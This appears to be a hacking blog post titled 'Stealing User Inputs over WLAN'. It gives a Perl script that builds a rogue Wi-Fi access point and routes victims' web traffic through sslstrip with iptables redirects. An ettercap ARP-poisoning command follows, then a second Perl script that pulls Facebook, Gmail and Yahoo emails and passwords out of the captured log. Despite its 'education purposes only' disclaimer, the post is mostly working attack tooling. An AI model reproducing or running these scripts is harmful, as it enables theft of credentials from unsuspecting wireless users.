oleg's AP with Sslstrip and Ettercap

Stealing User Inputs over WLAN [facebook, yahoo, google, twitter etc...]
#!/usr/bin/perl print '**********************************************************'," \n"; print "\e[1;33m \n"; print " OLEG's rogue AP \n"; print " Author: s4m \n"; print " Disclaimer: [This code is for education purposes only, \n"; print " would not be responsible for any misuse of this code.] \e[m\n"; print '**********************************************************',"\n\n"; use Getopt::Std; chomp($n); chomp($c); chomp($w); getopts(":n:c:w:", \%args); if(defined $args{n}){$n = $args{n};} if(defined $args{c}){$c = $args{c};} if(defined $args{w}){$w = $args{w};} if((!defined $args{n} || !defined $args{c} || !defined $args{w}) || (($args{c} !~ /\d+/) || ($args{c} > 13) || ($args{c} == 0))){ print "Usage: ./f.pl -n <\"fake ap\"> -c <1-13> -w <capture.file>\n\n\n"; exit; } @wint = qx(cat /proc/net/dev | tr -s ' ' | cut -d ' ' -f2,2 | sed 's\/:\/\/g'); $lint = @wint; foreach(@wint){ if($_ =~ m/mon(\d)/){ &monDevUp($1); } } sub monDevUp{ chomp; print "Stop \e[1;32m$_\e[0m monitor mode?:(y/n) "; $ans = lc(<STDIN>); chomp($ans); if($ans eq "y"){ system("airmon-ng stop $_"); system("clear"); print "\e[1;32m",$_,"\e[0m--> \e[1;31mStopped...\e[0m\n"; }else{ "\n"; } } print "\nWireless Interface(s):\n"; foreach(@wint){ if($_ =~ m/wlan/){ print $_; } } print "\n\nSelect an interface: "; $a = <STDIN>; $j = 0; while($j <= $lint){ if($a eq @wint[$j]){ &wirelessDevUp(@wint[$j]); } $j++; } sub wirelessDevUp{ system("airmon-ng start $_[0]"); system("clear"); @mon = qx(airmon-ng | grep "mon" | cut -c1-4); $monlen = @mon; $monInt = @mon[$monlen - 1]; sleep 2; qx(konsole -e airbase-ng -e $n -c $c $monInt); sleep 5; system("ifconfig at0 up"); system("ifconfig at0 192.168.1.254 netmask 255.255.255.0"); system("route add -net 192.168.1.255 netmask 255.255.255.0 gw 192.168.1.254"); system("mkdir -p /var/run/dhcpd"); system("chown dhcpd:dhcpd /var/run/dhcpd"); system("dhcpd3 -cf /etc/dhcp3/dhcpd.conf -pf /var/run/dhcpd/dhcpd.pid at0"); $dhcp = qx(/etc/init.d/dhcp3-server status); if($dhcp =~ m/dhcpd3 is not running./){ system("/etc/init.d/dhcp3-server start"); }else{ system("/etc/init.d/dhcp3-server restart"); } system("iptables -F"); system("iptables -t nat -F"); system("iptables --delete-chain"); system("iptables -t nat --delete-chain"); system("echo 1 > /proc/sys/net/ipv4/ip_forward"); system("iptables -t nat -A POSTROUTING --out-interface wlan0 -j MASQUERADE"); system("iptables -A FORWARD --in-interface at0 -j ACCEPT"); system("iptables -t nat -A PREROUTING -p udp --dport 53 -j DNAT --to 192.168.0.1"); system("iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-ports 10000"); sleep 4; qx(konsole -e sslstrip -a -l 10000 -w $w); }

Fire up Ettercap
ettercap -TqM arp:remote -i at0 // // -P remote_browser

Catching Prey
#!/usr/bin/perl print '**********************************************************'," \n"; print "\e[1;33m \n"; print " CATCHPREY \n"; print " Author: s4m \n"; print " Disclaimer: [This code is for education purposes only, \n"; print " would not be responsible for any misuse of this code.] \e[m\n"; print '**********************************************************',"\n\n"; use Getopt::Std; getopts(":c:",\%args); if(defined $args{c}){$c = $args{c};} if(!defined $args{c}){ print "\n\nUsage: ./catured.pl -c <input file from sslstrip>\n\n"; } open (F, "<$c") || die "couldn\'t open this file: $!\n"; @lines = <F>; foreach(@lines){ if(($_ =~ m/&email=(\S+)@(\w*\d*).(\w{3})&pass=(\S*)&default/)||($_ =~ m/&email=(\S+)%40(\w*\d*).(\w{3})&pass=(\S*)&persistent=1/)||($_ =~ m/&email=(\S+)%40(\w*\d*).(\w{3})&pass=(\S*)&default/)){ print "POSSIBLE FACEBOOK ACCOUNT\n"; print "\e[1;32mEMAIL\e[m : ".$1. '@' .$2. '.' .$3; print "\e[1;31m PASSWORD\e[m : " .$4; print "\n\n"; } if($_ =~ m/&Email=(\S+)&Passwd=(\S*)&signIn/){ print "POSSIBLE GMAIL ACCOUNT\n"; print "\e[1;32mEMAIL\e[m : ".$1; print "\e[1;31m PASSWORD\e[m : " .$2; print "\n\n"; } if(($_ =~ m/&login=(\S+)&pass=(\S*)&.saveC/)||($_ =~ m/&login=(\S+)&passwd=(\S*)&.persistent=y/)){ print "POSSIBLE YAHOO ACCOUNT\n"; print "\e[1;32mEMAIL\e[m : ".$1; print "\e[1;31m PASSWORD\e[m : " .$2; print "\n\n"; } } close (F);